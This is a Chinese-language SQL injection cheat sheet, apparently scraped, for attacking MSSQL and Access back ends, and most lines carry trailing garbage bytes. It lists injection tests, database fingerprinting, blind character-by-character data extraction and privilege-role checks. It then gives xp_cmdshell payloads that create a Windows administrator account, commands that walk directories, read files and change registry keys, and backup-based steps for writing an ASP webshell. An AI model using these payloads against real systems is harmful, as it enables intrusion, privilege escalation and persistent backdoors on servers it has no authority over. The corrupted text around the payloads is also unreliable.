1.判断是否有注入;and 1=1 ;and 1=2 |A~jsz6�pI
2.初步判断是否是mssql ;and user>0 �~W��'{��p
x+:UN'�"r
3.注入参数是字符'and [查询条件] and ''=' mDA�BH@��R
#G|RnV%t$~
4.搜索时没过滤参数的'and [查询条件] and '%25'=' [b�%D3-}'�
9&2�O�9Nz6
5.判断数据库系统 X7��MM2�V�
l�v<*7BCp
;and (select count(*) from sysobjects)>0 mssql 0S_~���\�t
��d�L 1t�l
;and (select count(*) from msysobjects)>0 access P )�"m0Lu<
2;`1h[,�-^
�b5I ��I/Y
/9��*�B)m"
6.猜数据库 ;and (select Count(*) from [数据库名])>0 �$9#H04.x�
�6<SAa#@ey
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 %lhEM}Sm
c|y(2K)o[=
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 /{��l$sBUL
,4e:I�.�b�
9.(1)猜字段的ascii值(access) �G6P?��2@�
H�5B:;�g�@
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 iC32��nY�?
Z�Y55�|e�E
(2)猜字段的ascii值(mssql) P6`u��._mX
iN\4gQ!���
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 zkrM/ @�p#
h�bDXo��:�
10.测试权限结构(mssql) �{X+3;&�@�
~�"H,/m%2o
{SPq$B_VR�
��Oc#syf�O
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- tj��Gn|+|k
ItVWO:x&�v
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- %6,SK�g� p
��&�X ):�4
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- -��H@�:�*�
d#Y^>"�|$.
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- �P>C~
i:4n
29"�'K.�r�
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- W~;�`W�R;.
Lc,�Pom���
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- ~9]�hV7y5C
;O6;.�5q&�
;and 1=(select IS_MEMBER('db_owner'));-- �|��Nn�)�m
RD���i��]2
BWa��,�f8�
A�aOu��L,l
11.添加mssql和系统的帐户 �F?*�-4�I-
,/%�=su�x�
;exec master.dbo.sp_addlogin username;-- |�Q6.29�9�
;exec master.dbo.sp_password null,username,password;-- wLH�>:yKUU
~��O0 $Suv
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- gIa+�5\qYY
)3}�9K
^jS
;exec master.dbo.xp_cmdshell 'net user username password ZR�B)uA)5=
nI-�w}N��Q
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- g"��DG]/ev
~�{g [<�Qi
;exec master.dbo.xp_cmdshell 'net user username password /add';-- mt{nm[D!Xp
KIf da�fRL
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- pfD��c9PMj
-��t'j�NR'
��L:�j<c�5
_x'�6�]f{n
12.(1)遍历目录 ^z�� I�W+:
F=e�8�IUr�
;create table dirs(paths varchar(100), id int) 2�!��m�/��
�IGQ�a�DFr
;insert dirs exec master.dbo.xp_dirtree 'c:\' 4#xD�gxg\f
jyUjlYAAv`
;and (select top 1 paths from dirs)>0 ��9igiZ�mM
Q800y??&J�
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) � n��u[ML�
M*, -z�Gr�
jh%�E�q+#S
,�{u
yG��:
(2)遍历目录 '(f*��2eE:
.m��,_N@,�
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- n�bD�*x�|�
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 ]�d0BN`*U.
^R�7lo�m�.
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 ��]I�dk:et
:'-/NtV)o?
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 �gj��wn7_�
^e�_hLX\SW
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 �x�7&B$.>3
@�s�;;O\��
H?vdr:WlTN
F�Ez-+X<q2
13.mssql中的存储过程 3�*�"WG O5
{0wI�R_dGX
xp_regenumvalues 注册表根键, 子键 t�;}|t�gC
e "4 ''�/
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 \5:i;A�E��
� 5h=}�j�
xp_regread 根键,子键,键值名 �%~H-)_d20
�?}�tFN_X"
;exec xp_regread a`E#F]�Z�
q��s6]-���
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 p
Z�|�V
�3
x�_N'TjS^{
xp_regwrite 根键,子键, 值名, 值类型, 值 x;P_1J�%Q
.�\ULbN3�Z
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 2oz�ax)GY�
Eex~�xi�iV
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 x�:NY��\._
S�]e|�"n~@
xp_regdeletevalue 根键,子键,值名 _~l5u8{^�6
Wd��H$JTk1
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 QC
OM_$��y
>�=I|�xY,
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 �#4Rx]zW^%
TC�wFPlF|�
o4F2%0�g�J
]�_��__��M
14.mssql的backup创建webshell !&y8@M�D15
-8y�wO�"6
use model &WuN&As!Z
�C\Wmq�
�[
create table cmd(str image); }_M�~2L�?i
~�?Q�e?�hB
insert into cmd(str) values (''); S}�m)OmrmA
YW�,tCtI0_
backup database model to disk='c:\l.asp'; Cx@);4a�rj
n`?�aC|P2s
1�y@i�}<9F
Xv5wJlc!d
15.mssql内置函数 Ct���<�udO
_�/s�$Z�Cd
;and (select @@version)>0 获得Windows的版本号 *��Mh�RW,=
z;,u}u}�aI
;and user_name()='dbo' 判断当前系统的连接用户是不是sa m{�Wu�"
;e
Y1W1=Uc uk
;and (select user_name())>0 爆当前系统的连接用户 �ur�s,34h�
.�L�nGL]�/
;and (select db_name())>0 得到当前连接的数据库 q.^�;!f1��
8?#/o�� c�
�rK6l�8)�o
YN�yk1c�E�
16.简洁的webshell T�"}5}6rSG
�mUA��i4N�
use model O-0x8�O^�B
z [��}v��{
create table cmd(str image); �5FPM`hL�T
B?gOHG*vd>
insert into cmd(str) values (''); ��Drg��v`z
+<��N��n~1
backup database model to disk='g:\wwwtest\l.asp';
